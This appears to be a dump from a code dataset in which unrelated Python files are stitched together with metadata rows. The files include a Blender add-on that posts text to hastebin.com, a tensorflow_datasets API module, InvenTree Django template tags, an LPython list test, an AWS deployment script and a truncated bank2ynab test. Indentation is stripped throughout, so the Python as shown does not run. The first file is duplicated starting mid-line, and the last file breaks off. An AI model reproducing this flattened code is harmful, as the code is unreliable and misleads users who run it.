"location": "Text editor > Properties panel",
"description": "Send your selection or text to hastebin.com",
"wiki_url": "http://wiki.blender.org/index.php/Extensions:2.6/Py/"
"Scripts/Text_Editor/hastebin",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Text Editor"}
import bpy
class TEXT_PT_hastebin(bpy.types.Panel):
bl_space_type = 'TEXT_EDITOR'
bl_region_type = 'UI'
bl_label = "hastebin.com"
def draw(self, context):
layout = self.layout
layout.operator("text.hastebin", icon='URL')
layout.prop(context.scene, "use_webbrowser")
class TEXT_OT_hastebin(bpy.types.Operator):
""""""
bl_idname = "text.hastebin"
bl_label = "hastebin.com"
bl_description = "Send the current text or selection to http://hastebin.com"
@classmethod
def poll(cls, context):
if context.area.type != 'TEXT_EDITOR':
return False
else:
            return context.space_data.text is not None
def invoke(self, context, event):
import webbrowser
st = context.space_data
# get the selected text
text = self.get_selected_text(st.text)
# if no text is selected send the whole file
if text is None: text = st.text.as_string()
# send the text and receive the returned page
page = self.send_text(text)
if page is None:
return {'CANCELLED'}
# store the link in the clipboard
bpy.context.window_manager.clipboard = page
if context.scene.use_webbrowser:
try:
webbrowser.open_new_tab(page)
except:
self.report({'WARNING'}, "Error in opening the page %s." % (page))
return {'FINISHED'}
def send_text(self, text):
""""""
import requests
base_url = "https://hastebin.com"
try:
response = requests.post(base_url + "/documents", text)
final_url = "%s/%s" % (base_url, response.json()['key'])
except requests.exceptions.SSLError:
self.report({'ERROR'}, "Error with SSL authorization, requires a more recent Blender")
return None
except:
self.report({'ERROR'}, "Error in sending the text to the server.")
return None
else:
return final_url
def get_selected_text(self, text):
""""""
current_line = text.current_line
select_end_line = text.select_end_line
current_character = text.current_character
select_end_character = text.select_end_character
# if there is no selected text return None
if current_line == select_end_line:
if current_character == select_end_character:
return None
else:
return current_line.body[min(current_character,select_end_character):max(current_character,select_end_character)]
text_return = None
writing = False
normal_order = True # selection from top to bottom
for line in text.lines:
if not writing:
if line == current_line:
text_return = current_line.body[current_character:] + "\n"
writing = True
continue
elif line == select_end_line:
text_return = select_end_line.body[select_end_character:] + "\n"
writing = True
normal_order = False
continue
else:
if normal_order:
if line == select_end_line:
text_return += select_end_line.body[:select_end_character]
break
else:
text_return += line.body + "\n"
continue
else:
if line == current_line:
text_return += current_line.body[:current_character]
break
else:
text_return += line.body + "\n"
continue
return text_return
def register():
bpy.types.Scene.use_webbrowser = bpy.props.BoolProperty(
name='Launch Browser',
description='Opens the page with the submitted text',
default=True)
bpy.utils.register_module(__name__)
def unregister():
del bpy.types.Scene.use_webbrowser
bpy.utils.unregister_module(__name__)
if __name__ == "__main__":
register()
| 32.627219
| 129
| 0.593399
|
Text_Editor/hastebin",
"tracker_url": "https://developer.blender.org/maniphest/task/edit/form/2/",
"category": "Text Editor"}
import bpy
class TEXT_PT_hastebin(bpy.types.Panel):
bl_space_type = 'TEXT_EDITOR'
bl_region_type = 'UI'
bl_label = "hastebin.com"
def draw(self, context):
layout = self.layout
layout.operator("text.hastebin", icon='URL')
layout.prop(context.scene, "use_webbrowser")
class TEXT_OT_hastebin(bpy.types.Operator):
bl_idname = "text.hastebin"
bl_label = "hastebin.com"
bl_description = "Send the current text or selection to http://hastebin.com"
@classmethod
def poll(cls, context):
if context.area.type != 'TEXT_EDITOR':
return False
else:
            return context.space_data.text is not None
def invoke(self, context, event):
import webbrowser
st = context.space_data
text = self.get_selected_text(st.text)
if text is None: text = st.text.as_string()
page = self.send_text(text)
if page is None:
return {'CANCELLED'}
bpy.context.window_manager.clipboard = page
if context.scene.use_webbrowser:
try:
webbrowser.open_new_tab(page)
except:
self.report({'WARNING'}, "Error in opening the page %s." % (page))
return {'FINISHED'}
def send_text(self, text):
import requests
base_url = "https://hastebin.com"
try:
response = requests.post(base_url + "/documents", text)
final_url = "%s/%s" % (base_url, response.json()['key'])
except requests.exceptions.SSLError:
self.report({'ERROR'}, "Error with SSL authorization, requires a more recent Blender")
return None
except:
self.report({'ERROR'}, "Error in sending the text to the server.")
return None
else:
return final_url
def get_selected_text(self, text):
current_line = text.current_line
select_end_line = text.select_end_line
current_character = text.current_character
select_end_character = text.select_end_character
if current_line == select_end_line:
if current_character == select_end_character:
return None
else:
return current_line.body[min(current_character,select_end_character):max(current_character,select_end_character)]
text_return = None
writing = False
normal_order = True
for line in text.lines:
if not writing:
if line == current_line:
text_return = current_line.body[current_character:] + "\n"
writing = True
continue
elif line == select_end_line:
text_return = select_end_line.body[select_end_character:] + "\n"
writing = True
normal_order = False
continue
else:
if normal_order:
if line == select_end_line:
text_return += select_end_line.body[:select_end_character]
break
else:
text_return += line.body + "\n"
continue
else:
if line == current_line:
text_return += current_line.body[:current_character]
break
else:
text_return += line.body + "\n"
continue
return text_return
def register():
bpy.types.Scene.use_webbrowser = bpy.props.BoolProperty(
name='Launch Browser',
description='Opens the page with the submitted text',
default=True)
bpy.utils.register_module(__name__)
def unregister():
del bpy.types.Scene.use_webbrowser
bpy.utils.unregister_module(__name__)
if __name__ == "__main__":
register()
| true
| true
|
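Outside Blender, the upload in send_text reduces to a single POST. A minimal sketch, assuming requests is installed; note that hastebin.com's public API has changed since this add-on was written (it may now require an API key), so the endpoint is illustrative:

import requests

base_url = "https://hastebin.com"  # endpoint as used in the add-on; the live API may differ
response = requests.post(base_url + "/documents", data="print('hello world')")
response.raise_for_status()
print("%s/%s" % (base_url, response.json()["key"]))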
1c40d8c2ee70c98476b025510a63d8e9b4910304
| 3,606
|
py
|
Python
|
Setup/install.py
|
SyedRizvi-TomTom/aws-xray-cloudwatch-event
|
90e8b1e71d801f3dd59ba25ee880ae0f9f581cdf
|
[
"Apache-2.0"
] | null | null | null |
Setup/install.py
|
SyedRizvi-TomTom/aws-xray-cloudwatch-event
|
90e8b1e71d801f3dd59ba25ee880ae0f9f581cdf
|
[
"Apache-2.0"
] | null | null | null |
Setup/install.py
|
SyedRizvi-TomTom/aws-xray-cloudwatch-event
|
90e8b1e71d801f3dd59ba25ee880ae0f9f581cdf
|
[
"Apache-2.0"
] | null | null | null |
'''
/*Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License").
You may not use this file except in compliance with the License.
A copy of the License is located at http://aws.amazon.com/apache2.0/ or in the "license" file accompanying this file.
This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.*/
'''
import os
import json
appname = raw_input("Enter a unique name for your app {pattern:^[a-z0-9]+$}:")
print("Your appname:"+appname+" will be used for naming your CloudFormation stack, public s3 bucket and as a prefix as a prefix to identify all the Lambda functions and IAM Roles associated with your app")
print("The region should be the same as your service running in X-Ray. If your service runs in multiple regions then you should have multiple instances of this sample app running in each region.")
sampleappregion = raw_input("Enter the aws region where you would like this sample app to be deployed. (Default: us-west-2): ") or "us-west-2"
# Setting time to analyze servicemap. Default set to 6 hours if not found in xraycloudwatcheventfile.json.
xraycloudwatcheventfile = open('xraycloudwatchevent.json', 'r').read()
xraycloudwatcheventdict = json.loads(xraycloudwatcheventfile)
analyzeservicemapminutes = xraycloudwatcheventdict['analyzeservicemapminutes'] if 'analyzeservicemapminutes' in xraycloudwatcheventdict else 360
evaluationperiodforcwalarm = xraycloudwatcheventdict['evaluationperiodforcwalarm'] if 'evaluationperiodforcwalarm' in xraycloudwatcheventdict else 1
print("Setting to analyze your service map every: %d minutes" % analyzeservicemapminutes)
# Zip the Lambda function and node folders
print("Zipping the file that has to be uploaded to AWS Lambda")
zipcommand = "zip -q -r Archive.zip xraycloudwatchevent.py"
os.system(zipcommand)
# Create s3 bucket to store the Archive
print("Creating S3 bucket that will have the Archive.zip file for AWS Lambda")
s3createcommand = "aws s3api create-bucket --create-bucket-configuration LocationConstraint=%s --acl private --bucket lambdacodexcw" % sampleappregion
os.system(s3createcommand)
# Upload Archive.zip to s3 bucket
print("Uploading Archive.zip to the S3 bucket")
s3uploadcommand = "aws s3 cp Archive.zip s3://lambdacodexcw"
os.system(s3uploadcommand)
# Deploy resources in a CloudFormation stack
periodcwalarm=analyzeservicemapminutes*60 # Converting analyzeservicemapminutes from minutes to seconds
print("Deploying resources from the Cloudformation template")
cfcommand = "aws --region %s cloudformation deploy --template-file xraycloudwatchevent.template --stack-name %s --parameter-overrides appname=%s analyzeservicemapminutes=%d periodcwalarm=%d evaluationperiodforcwalarm=%d --capabilities CAPABILITY_NAMED_IAM" % (sampleappregion, appname, appname, analyzeservicemapminutes,periodcwalarm,evaluationperiodforcwalarm)
print(cfcommand)
os.system(cfcommand)
print("Completed deploying resources from the Cloudformation template.")
# Upload xraycloudwatchevent.json to s3 bucket
print("Uploading xraycloudwatchevent.json to the S3 bucket")
s3uploadcommand = "aws s3 cp xraycloudwatchevent.json s3://"+appname+"-xraycloudwatcheventbucket"
os.system(s3uploadcommand)
# Delete bucket that has the lambda code
deletes3lambdabucket = "aws s3 rb s3://lambdacodexcw --force"
os.system(deletes3lambdabucket)
print("Deleted temporary s3 bucket")
print("-All set-")
| 54.636364
| 361
| 0.801997
|
import os
import json
appname = raw_input("Enter a unique name for your app {pattern:^[a-z0-9]+$}:")
print("Your appname:"+appname+" will be used for naming your CloudFormation stack, public s3 bucket and as a prefix as a prefix to identify all the Lambda functions and IAM Roles associated with your app")
print("The region should be the same as your service running in X-Ray. If your service runs in multiple regions then you should have multiple instances of this sample app running in each region.")
sampleappregion = raw_input("Enter the aws region where you would like this sample app to be deployed. (Default: us-west-2): ") or "us-west-2"
xraycloudwatcheventfile = open('xraycloudwatchevent.json', 'r').read()
xraycloudwatcheventdict = json.loads(xraycloudwatcheventfile)
analyzeservicemapminutes = xraycloudwatcheventdict['analyzeservicemapminutes'] if 'analyzeservicemapminutes' in xraycloudwatcheventdict else 360
evaluationperiodforcwalarm = xraycloudwatcheventdict['evaluationperiodforcwalarm'] if 'evaluationperiodforcwalarm' in xraycloudwatcheventdict else 1
print("Setting to analyze your service map every: %d minutes" % analyzeservicemapminutes)
print("Zipping the file that has to be uploaded to AWS Lambda")
zipcommand = "zip -q -r Archive.zip xraycloudwatchevent.py"
os.system(zipcommand)
print("Creating S3 bucket that will have the Archive.zip file for AWS Lambda")
s3createcommand = "aws s3api create-bucket --create-bucket-configuration LocationConstraint=%s --acl private --bucket lambdacodexcw" % sampleappregion
os.system(s3createcommand)
print("Uploading Archive.zip to the S3 bucket")
s3uploadcommand = "aws s3 cp Archive.zip s3://lambdacodexcw"
os.system(s3uploadcommand)
periodcwalarm=analyzeservicemapminutes*60
print("Deploying resources from the Cloudformation template")
cfcommand = "aws --region %s cloudformation deploy --template-file xraycloudwatchevent.template --stack-name %s --parameter-overrides appname=%s analyzeservicemapminutes=%d periodcwalarm=%d evaluationperiodforcwalarm=%d --capabilities CAPABILITY_NAMED_IAM" % (sampleappregion, appname, appname, analyzeservicemapminutes,periodcwalarm,evaluationperiodforcwalarm)
print(cfcommand)
os.system(cfcommand)
print("Completed deploying resources from the Cloudformation template.")
print("Uploading xraycloudwatchevent.json to the S3 bucket")
s3uploadcommand = "aws s3 cp xraycloudwatchevent.json s3://"+appname+"-xraycloudwatcheventbucket"
os.system(s3uploadcommand)
deletes3lambdabucket = "aws s3 rb s3://lambdacodexcw --force"
os.system(deletes3lambdabucket)
print("Deleted temporary s3 bucket")
print("-All set-")
| true
| true
|
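The installer drives everything through os.system, which silently ignores failures. A minimal sketch of one step rewritten with subprocess.run, assuming the AWS CLI is installed and configured (bucket name taken from the script above):

import subprocess

# check=True raises CalledProcessError on a non-zero exit code,
# instead of continuing silently the way os.system does.
subprocess.run(
    ["aws", "s3", "cp", "Archive.zip", "s3://lambdacodexcw"],
    check=True,
)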
1c40da02d769adb5740c546f1fd8aa5897d22286
| 3,044
|
py
|
Python
|
tensorflow_datasets/public_api.py
|
mdautrey/datasets
|
5ad83a418d3505619c4282d2b3ff7a80edc45469
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/public_api.py
|
mdautrey/datasets
|
5ad83a418d3505619c4282d2b3ff7a80edc45469
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_datasets/public_api.py
|
mdautrey/datasets
|
5ad83a418d3505619c4282d2b3ff7a80edc45469
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2020 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Public API of tfds, without the registered dataset."""
# pylint: disable=unused-import,g-import-not-at-top,g-bad-import-order,wrong-import-position
from tensorflow_datasets.core import tf_compat
tf_compat.ensure_tf_install()
from tensorflow_datasets import core
from tensorflow_datasets.core import folder_dataset
from tensorflow_datasets.core import download
from tensorflow_datasets.core import decode
from tensorflow_datasets.core import deprecated
from tensorflow_datasets.core import features
from tensorflow_datasets.core import units
from tensorflow_datasets.core import visualization
from tensorflow_datasets.core.as_dataframe import as_dataframe
from tensorflow_datasets.core.folder_dataset import ImageFolder
from tensorflow_datasets.core.folder_dataset import TranslateFolder
from tensorflow_datasets.core.dataset_utils import as_numpy
from tensorflow_datasets.core.download import GenerateMode
from tensorflow_datasets.core.load import builder
from tensorflow_datasets.core.load import builder_cls
from tensorflow_datasets.core.load import list_builders
from tensorflow_datasets.core.load import load
from tensorflow_datasets.core.splits import even_splits
from tensorflow_datasets.core.splits import Split
from tensorflow_datasets.core.utils import type_utils as typing
from tensorflow_datasets.core.utils.gcs_utils import is_dataset_on_gcs
from tensorflow_datasets.core.utils.read_config import ReadConfig
from tensorflow_datasets.core.utils.tqdm_utils import disable_progress_bar
from tensorflow_datasets.core.visualization import show_examples
from tensorflow_datasets.core.visualization import show_statistics
from tensorflow_datasets.version import __version__
deprecated = core.utils.docs.deprecated(deprecated)
with core.registered.skip_registration():
# We import testing namespace but without registering the tests datasets
# (e.g. DummyMnist,...).
from tensorflow_datasets import testing
__all__ = [
"as_dataframe",
"as_numpy",
"core",
"deprecated",
"folder_dataset",
"builder",
"builder_cls",
"decode",
"disable_progress_bar",
"download",
"even_splits",
"features",
"GenerateMode",
"ImageFolder",
"is_dataset_on_gcs",
"list_builders",
"load",
"ReadConfig",
"Split",
"show_examples",
"show_statistics",
"testing",
"TranslateFolder",
"typing",
"units",
"visualization",
"__version__",
]
| 35.395349
| 92
| 0.796321
|
from tensorflow_datasets.core import tf_compat
tf_compat.ensure_tf_install()
from tensorflow_datasets import core
from tensorflow_datasets.core import folder_dataset
from tensorflow_datasets.core import download
from tensorflow_datasets.core import decode
from tensorflow_datasets.core import deprecated
from tensorflow_datasets.core import features
from tensorflow_datasets.core import units
from tensorflow_datasets.core import visualization
from tensorflow_datasets.core.as_dataframe import as_dataframe
from tensorflow_datasets.core.folder_dataset import ImageFolder
from tensorflow_datasets.core.folder_dataset import TranslateFolder
from tensorflow_datasets.core.dataset_utils import as_numpy
from tensorflow_datasets.core.download import GenerateMode
from tensorflow_datasets.core.load import builder
from tensorflow_datasets.core.load import builder_cls
from tensorflow_datasets.core.load import list_builders
from tensorflow_datasets.core.load import load
from tensorflow_datasets.core.splits import even_splits
from tensorflow_datasets.core.splits import Split
from tensorflow_datasets.core.utils import type_utils as typing
from tensorflow_datasets.core.utils.gcs_utils import is_dataset_on_gcs
from tensorflow_datasets.core.utils.read_config import ReadConfig
from tensorflow_datasets.core.utils.tqdm_utils import disable_progress_bar
from tensorflow_datasets.core.visualization import show_examples
from tensorflow_datasets.core.visualization import show_statistics
from tensorflow_datasets.version import __version__
deprecated = core.utils.docs.deprecated(deprecated)
with core.registered.skip_registration():
from tensorflow_datasets import testing
__all__ = [
"as_dataframe",
"as_numpy",
"core",
"deprecated",
"folder_dataset",
"builder",
"builder_cls",
"decode",
"disable_progress_bar",
"download",
"even_splits",
"features",
"GenerateMode",
"ImageFolder",
"is_dataset_on_gcs",
"list_builders",
"load",
"ReadConfig",
"Split",
"show_examples",
"show_statistics",
"testing",
"TranslateFolder",
"typing",
"units",
"visualization",
"__version__",
]
| true
| true
|
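A minimal sketch of how the API re-exported above is typically consumed, assuming tensorflow-datasets is installed and the dataset files can be downloaded:

import tensorflow_datasets as tfds

ds, info = tfds.load("mnist", split="train", with_info=True)
print(info.features)

# as_numpy converts tf.data elements to NumPy for plain-Python use.
for example in tfds.as_numpy(ds.take(1)):
    print(example["image"].shape, example["label"])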
1c40dad565424aa804e988e7f0c48edb8069d843
| 455
|
py
|
Python
|
tests/list1.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 31
|
2022-01-07T23:56:33.000Z
|
2022-03-29T16:09:02.000Z
|
tests/list1.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 197
|
2021-12-29T19:01:41.000Z
|
2022-03-31T15:58:25.000Z
|
tests/list1.py
|
akshanshbhatt/lpython
|
70fef49dbbb6cbb0447f7013231171e5c8b8e5df
|
[
"BSD-3-Clause"
] | 17
|
2022-01-06T15:34:36.000Z
|
2022-03-31T13:55:33.000Z
|
def test_List():
a: list[i32]
a = [1, 2, 3]
a = [-3, -2, -1]
# a = [-2, -1, 0.45] -> semantic error
b: list[str]
b = ["a", "b", "c"]
c: list[list[i32]]
c = [[1, 2, 3], [4, 5, 6]]
d: i32
d = a[2]
# ragged list
e: list[list[str]]
e = [['a', 'b', 'c'], ['d', 'e']]
a.append(10)
a.remove(1)
a.insert(2, 13)
a = a[0:2]
d = a.pop()
d = a.pop(2)
a += [4, 5]
a = [6, 7] + a
| 16.25
| 42
| 0.356044
|
def test_List():
a: list[i32]
a = [1, 2, 3]
a = [-3, -2, -1]
b: list[str]
b = ["a", "b", "c"]
c: list[list[i32]]
c = [[1, 2, 3], [4, 5, 6]]
d: i32
d = a[2]
e: list[list[str]]
e = [['a', 'b', 'c'], ['d', 'e']]
a.append(10)
a.remove(1)
a.insert(2, 13)
a = a[0:2]
d = a.pop()
d = a.pop(2)
a += [4, 5]
a = [6, 7] + a
| true
| true
|
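For reference, the list operations exercised by this LPython test behave as follows in plain CPython (where the i32 annotations are ordinary type hints):

a = [1, 2, 3]
a.append(10)     # [1, 2, 3, 10]
a.remove(1)      # removes the first occurrence of the value 1
a.insert(2, 13)  # [2, 3, 13, 10]
a = a[0:2]       # slicing copies: [2, 3]
d = a.pop()      # d == 3, a == [2]
a += [4, 5]      # in-place extend
a = [6, 7] + a   # concatenation builds a new list
print(a, d)      # [6, 7, 2, 4, 5] 3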
1c40dae30ee101fc406cd20627c4cdfdd63c602f
| 7,174
|
py
|
Python
|
InvenTree/part/templatetags/inventree_extras.py
|
TheCrazyMaffin/InvenTree
|
2686f61a4ac279386a83049745339345f1ac4cf7
|
[
"MIT"
] | null | null | null |
InvenTree/part/templatetags/inventree_extras.py
|
TheCrazyMaffin/InvenTree
|
2686f61a4ac279386a83049745339345f1ac4cf7
|
[
"MIT"
] | null | null | null |
InvenTree/part/templatetags/inventree_extras.py
|
TheCrazyMaffin/InvenTree
|
2686f61a4ac279386a83049745339345f1ac4cf7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""" This module provides template tags for extra functionality
over and above the built-in Django tags.
"""
import os
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as djangosettings
from django import template
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.templatetags.static import StaticNode
from InvenTree import version, settings
import InvenTree.helpers
from common.models import InvenTreeSetting, ColorTheme
from common.settings import currency_code_default
register = template.Library()
@register.simple_tag()
def define(value, *args, **kwargs):
"""
Shortcut function to overcome the shortcomings of the django templating language
Use as follows: {% define "hello_world" as hello %}
Ref: https://stackoverflow.com/questions/1070398/how-to-set-a-value-of-a-variable-inside-a-template-code
"""
return value
@register.simple_tag()
def decimal(x, *args, **kwargs):
""" Simplified rendering of a decimal number """
return InvenTree.helpers.decimal2string(x)
@register.simple_tag()
def str2bool(x, *args, **kwargs):
""" Convert a string to a boolean value """
return InvenTree.helpers.str2bool(x)
@register.simple_tag()
def inrange(n, *args, **kwargs):
""" Return range(n) for iterating through a numeric quantity """
return range(n)
@register.simple_tag()
def multiply(x, y, *args, **kwargs):
""" Multiply two numbers together """
return InvenTree.helpers.decimal2string(x * y)
@register.simple_tag()
def add(x, y, *args, **kwargs):
""" Add two numbers together """
return x + y
@register.simple_tag()
def part_allocation_count(build, part, *args, **kwargs):
""" Return the total number of <part> allocated to <build> """
return InvenTree.helpers.decimal2string(build.getAllocatedQuantity(part))
@register.simple_tag()
def inventree_in_debug_mode(*args, **kwargs):
""" Return True if the server is running in DEBUG mode """
return djangosettings.DEBUG
@register.simple_tag()
def inventree_docker_mode(*args, **kwargs):
""" Return True if the server is running as a Docker image """
return djangosettings.DOCKER
@register.simple_tag()
def inventree_db_engine(*args, **kwargs):
""" Return the InvenTree database backend e.g. 'postgresql' """
db = djangosettings.DATABASES['default']
engine = db.get('ENGINE', _('Unknown database'))
engine = engine.replace('django.db.backends.', '')
return engine
@register.simple_tag()
def inventree_instance_name(*args, **kwargs):
""" Return the InstanceName associated with the current database """
return version.inventreeInstanceName()
@register.simple_tag()
def inventree_title(*args, **kwargs):
""" Return the title for the current instance - respecting the settings """
return version.inventreeInstanceTitle()
@register.simple_tag()
def inventree_version(*args, **kwargs):
""" Return InvenTree version string """
return version.inventreeVersion()
@register.simple_tag()
def inventree_api_version(*args, **kwargs):
""" Return InvenTree API version """
return version.inventreeApiVersion()
@register.simple_tag()
def django_version(*args, **kwargs):
""" Return Django version string """
return version.inventreeDjangoVersion()
@register.simple_tag()
def inventree_commit_hash(*args, **kwargs):
""" Return InvenTree git commit hash string """
return version.inventreeCommitHash()
@register.simple_tag()
def inventree_commit_date(*args, **kwargs):
""" Return InvenTree git commit date string """
return version.inventreeCommitDate()
@register.simple_tag()
def inventree_github_url(*args, **kwargs):
""" Return URL for InvenTree github site """
return "https://github.com/InvenTree/InvenTree/"
@register.simple_tag()
def inventree_docs_url(*args, **kwargs):
""" Return URL for InvenTree documenation site """
return "https://inventree.readthedocs.io/"
@register.simple_tag()
def inventree_credits_url(*args, **kwargs):
""" Return URL for InvenTree credits site """
return "https://inventree.readthedocs.io/en/latest/credits/"
@register.simple_tag()
def default_currency(*args, **kwargs):
""" Returns the default currency code """
return currency_code_default()
@register.simple_tag()
def setting_object(key, *args, **kwargs):
"""
    Return a setting object specified by the given key
(Or return None if the setting does not exist)
"""
setting = InvenTreeSetting.get_setting_object(key)
return setting
@register.simple_tag()
def settings_value(key, *args, **kwargs):
"""
Return a settings value specified by the given key
"""
return InvenTreeSetting.get_setting(key)
@register.simple_tag()
def get_color_theme_css(username):
try:
user_theme = ColorTheme.objects.filter(user=username).get()
user_theme_name = user_theme.name
if not user_theme_name or not ColorTheme.is_valid_choice(user_theme):
user_theme_name = 'default'
except ColorTheme.DoesNotExist:
user_theme_name = 'default'
# Build path to CSS sheet
inventree_css_sheet = os.path.join('css', 'color-themes', user_theme_name + '.css')
# Build static URL
inventree_css_static_url = os.path.join(settings.STATIC_URL, inventree_css_sheet)
return inventree_css_static_url
@register.simple_tag()
def authorized_owners(group):
""" Return authorized owners """
owners = []
try:
for owner in group.get_related_owners(include_group=True):
owners.append(owner.owner)
except AttributeError:
# group is None
pass
except TypeError:
# group.get_users returns None
pass
return owners
@register.simple_tag()
def object_link(url_name, pk, ref):
""" Return highlighted link to object """
ref_url = reverse(url_name, kwargs={'pk': pk})
return mark_safe('<b><a href="{}">{}</a></b>'.format(ref_url, ref))
class I18nStaticNode(StaticNode):
"""
custom StaticNode
replaces a variable named *lng* in the path with the current language
"""
def render(self, context):
self.path.var = self.path.var.format(lng=context.request.LANGUAGE_CODE)
ret = super().render(context)
return ret
# use the dynamic url - tag if in Debugging-Mode
if settings.DEBUG:
@register.simple_tag()
def i18n_static(url_name):
""" simple tag to enable {% url %} functionality instead of {% static %} """
return reverse(url_name)
else:
@register.tag('i18n_static')
def do_i18n_static(parser, token):
"""
        Overrides the normal static tag, adding language lookup for prerendered files (#1485)
usage (like static):
{% i18n_static path [as varname] %}
"""
bits = token.split_contents()
loc_name = settings.STATICFILES_I18_PREFIX
        # change path to the called resource
bits[1] = f"'{loc_name}/{{lng}}.{bits[1][1:-1]}'"
token.contents = ' '.join(bits)
return I18nStaticNode.handle_token(parser, token)
| 26.182482
| 108
| 0.695707
|
import os
from django.utils.translation import ugettext_lazy as _
from django.conf import settings as djangosettings
from django import template
from django.urls import reverse
from django.utils.safestring import mark_safe
from django.templatetags.static import StaticNode
from InvenTree import version, settings
import InvenTree.helpers
from common.models import InvenTreeSetting, ColorTheme
from common.settings import currency_code_default
register = template.Library()
@register.simple_tag()
def define(value, *args, **kwargs):
return value
@register.simple_tag()
def decimal(x, *args, **kwargs):
return InvenTree.helpers.decimal2string(x)
@register.simple_tag()
def str2bool(x, *args, **kwargs):
return InvenTree.helpers.str2bool(x)
@register.simple_tag()
def inrange(n, *args, **kwargs):
return range(n)
@register.simple_tag()
def multiply(x, y, *args, **kwargs):
return InvenTree.helpers.decimal2string(x * y)
@register.simple_tag()
def add(x, y, *args, **kwargs):
return x + y
@register.simple_tag()
def part_allocation_count(build, part, *args, **kwargs):
return InvenTree.helpers.decimal2string(build.getAllocatedQuantity(part))
@register.simple_tag()
def inventree_in_debug_mode(*args, **kwargs):
return djangosettings.DEBUG
@register.simple_tag()
def inventree_docker_mode(*args, **kwargs):
return djangosettings.DOCKER
@register.simple_tag()
def inventree_db_engine(*args, **kwargs):
db = djangosettings.DATABASES['default']
engine = db.get('ENGINE', _('Unknown database'))
engine = engine.replace('django.db.backends.', '')
return engine
@register.simple_tag()
def inventree_instance_name(*args, **kwargs):
return version.inventreeInstanceName()
@register.simple_tag()
def inventree_title(*args, **kwargs):
return version.inventreeInstanceTitle()
@register.simple_tag()
def inventree_version(*args, **kwargs):
return version.inventreeVersion()
@register.simple_tag()
def inventree_api_version(*args, **kwargs):
return version.inventreeApiVersion()
@register.simple_tag()
def django_version(*args, **kwargs):
return version.inventreeDjangoVersion()
@register.simple_tag()
def inventree_commit_hash(*args, **kwargs):
return version.inventreeCommitHash()
@register.simple_tag()
def inventree_commit_date(*args, **kwargs):
return version.inventreeCommitDate()
@register.simple_tag()
def inventree_github_url(*args, **kwargs):
return "https://github.com/InvenTree/InvenTree/"
@register.simple_tag()
def inventree_docs_url(*args, **kwargs):
return "https://inventree.readthedocs.io/"
@register.simple_tag()
def inventree_credits_url(*args, **kwargs):
return "https://inventree.readthedocs.io/en/latest/credits/"
@register.simple_tag()
def default_currency(*args, **kwargs):
return currency_code_default()
@register.simple_tag()
def setting_object(key, *args, **kwargs):
setting = InvenTreeSetting.get_setting_object(key)
return setting
@register.simple_tag()
def settings_value(key, *args, **kwargs):
return InvenTreeSetting.get_setting(key)
@register.simple_tag()
def get_color_theme_css(username):
try:
user_theme = ColorTheme.objects.filter(user=username).get()
user_theme_name = user_theme.name
if not user_theme_name or not ColorTheme.is_valid_choice(user_theme):
user_theme_name = 'default'
except ColorTheme.DoesNotExist:
user_theme_name = 'default'
inventree_css_sheet = os.path.join('css', 'color-themes', user_theme_name + '.css')
inventree_css_static_url = os.path.join(settings.STATIC_URL, inventree_css_sheet)
return inventree_css_static_url
@register.simple_tag()
def authorized_owners(group):
owners = []
try:
for owner in group.get_related_owners(include_group=True):
owners.append(owner.owner)
except AttributeError:
pass
except TypeError:
pass
return owners
@register.simple_tag()
def object_link(url_name, pk, ref):
ref_url = reverse(url_name, kwargs={'pk': pk})
return mark_safe('<b><a href="{}">{}</a></b>'.format(ref_url, ref))
class I18nStaticNode(StaticNode):
def render(self, context):
self.path.var = self.path.var.format(lng=context.request.LANGUAGE_CODE)
ret = super().render(context)
return ret
if settings.DEBUG:
@register.simple_tag()
def i18n_static(url_name):
return reverse(url_name)
else:
@register.tag('i18n_static')
def do_i18n_static(parser, token):
"""
        Overrides the normal static tag, adding language lookup for prerendered files (#1485)
usage (like static):
{% i18n_static path [as varname] %}
"""
bits = token.split_contents()
loc_name = settings.STATICFILES_I18_PREFIX
bits[1] = f"'{loc_name}/{{lng}}.{bits[1][1:-1]}'"
token.contents = ' '.join(bits)
return I18nStaticNode.handle_token(parser, token)
| true
| true
|
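All of the tags above follow one Django pattern: a module-level template.Library whose decorated functions become template tags. A minimal standalone sketch (my_tags is a hypothetical module name):

from django import template

register = template.Library()

@register.simple_tag()
def multiply(x, y):
    return x * y

# In a template, after {% load my_tags %}:
#   {% multiply 6 7 %}  renders 42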
1c40dc2678afa914ac2937d94976a7a9a48cada1
| 16,761
|
py
|
Python
|
test/test_YNAB_API.py
|
MatissJanis/bank2ynab
|
ade89b2aa5062821540a2efd3f91594c8f930469
|
[
"MIT"
] | null | null | null |
test/test_YNAB_API.py
|
MatissJanis/bank2ynab
|
ade89b2aa5062821540a2efd3f91594c8f930469
|
[
"MIT"
] | null | null | null |
test/test_YNAB_API.py
|
MatissJanis/bank2ynab
|
ade89b2aa5062821540a2efd3f91594c8f930469
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from unittest.mock import patch
from os.path import join
import os
from shutil import copyfile
import configparser
from test.utils import get_test_confparser, get_project_dir
from bank2ynab.b2y_utilities import (
get_configs,
string_num_diff,
get_config_line,
option_selection,
)
from bank2ynab.ynab_api import YNAB_API
class Test_YNAB_API(TestCase):
def setUp(self):
self.TESTCONFPATH = join(get_project_dir(), "test-data", "test.conf")
